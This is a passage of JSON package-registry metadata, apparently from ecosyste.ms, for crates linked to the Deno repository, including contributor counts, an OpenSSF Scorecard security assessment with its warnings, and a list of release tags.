itHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_lib/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-01-20T13:08:32.679Z","updated_at":"2025-01-20T13:08:32.679Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-20T13:08:32.987Z","updated_at":"2025-01-20T13:08:32.987Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":5858419,"name":"pacstall-rs","ecosystem":"cargo","description":"An AUR-inspired package manager for Ubuntu","homepage":"https://github.com/denoland/deno","licenses":"GPL-3.0","normalized_licenses":["GPL-3.0"],"repository_url":"https://github.com/denoland/deno","keywords_array":["linux","package-manager","aur","pacstall","apt"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-01-11T08:16:53.031Z","latest_release_published_at":"2023-01-11T08:22:04.820Z","latest_release_number":"2.0.0","last_synced_at":"2026-08-29T21:57:22.743Z","created_at":"2023-01-11T08:24:13.970Z","updated_at":"2026-08-29T21:57:22.744Z","registry_url":"https://crates.io/crates/pacstall-rs/","install_command":"cargo install pacstall-rs","documentation_url":"https://docs.rs/pacstall-rs/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9